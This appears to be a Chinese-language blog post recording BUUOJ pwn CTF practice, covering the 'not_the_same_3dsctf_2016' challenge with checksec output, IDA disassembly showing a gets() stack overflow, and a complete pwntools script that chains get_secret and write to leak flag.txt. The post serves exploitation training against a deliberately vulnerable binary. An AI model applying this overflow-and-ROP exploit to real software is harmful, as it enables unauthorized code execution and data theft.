BUUOJ pwn刷题记录(持续更新)

Posted on

Stack & ROP

1
TODO....

not_the_same_3dsctf_2016

checksec

1
2
3
4
5
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

使用IDA打开,找到main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.text:080489E0             ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:080489E0                             public main
.text:080489E0             main            proc near               ; DATA XREF: _start+17↑o
.text:080489E0
.text:080489E0             var_3C          = dword ptr -3Ch
.text:080489E0             var_2D          = byte ptr -2Dh
.text:080489E0             argc            = dword ptr  4
.text:080489E0             argv            = dword ptr  8
.text:080489E0             envp            = dword ptr  0Ch
.text:080489E0
.text:080489E0 83 EC 3C                    sub     esp, 3Ch
.text:080489E3 C7 04 24 B1+                mov     [esp+3Ch+var_3C], offset aB0r4V3rS37u4hO ; "b0r4 v3r s3 7u 4h o b1ch4o m3m0... "
.text:080489E3 C2 0B 08
.text:080489EA E8 B1 66 00+                call    printf
.text:080489EA 00
.text:080489EF 8D 44 24 0F                 lea     eax, [esp+3Ch+var_2D]
.text:080489F3 89 04 24                    mov     [esp+3Ch+var_3C], eax
.text:080489F6 E8 D5 6E 00+                call    gets
.text:080489F6 00
.text:080489FB 31 C0                       xor     eax, eax
.text:080489FD 83 C4 3C                    add     esp, 3Ch
.text:08048A00 C3                          retn
.text:08048A00             main            endp

程序逻辑很清晰,用户输入到var_2D,此时gets造成了栈溢出。接下来结束利用栈溢出,实现跳转到任意函数,在这里我们发现有一个get_secret函数执行了读取flag.txt的操作,很明显这是出题人特地放在这里的。但是该函数并不会输出flag.txt的内容到stdout,我们需要再使用write手动输出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *


def main():
    context.log_level = 'debug'
    context.arch = 'i386'
    context.bits = 32

    if len(sys.argv) == 3:
        p = remote(sys.argv[1], sys.argv[2])
    else:
        p = process('./not_the_same_3dsctf_2016')
    gdb.attach(p, 'b get_secret')
    elf = ELF('./not_the_same_3dsctf_2016')
    print('ok..')
    get_secret_addr = 0x080489A0
    write_addr = elf.sym['write']
    flag_addr = 0x080ECA2D
    payload = b'a' * (0x2d) + p32(get_secret_addr) + \
        p32(write_addr) + p32(flag_addr) + p32(1) + \
        p32(flag_addr) + p32(42)

    print('ok..')
    p.sendline(payload)
    p.interactive()
    pass


if __name__ == '__main__':
    main()

Heap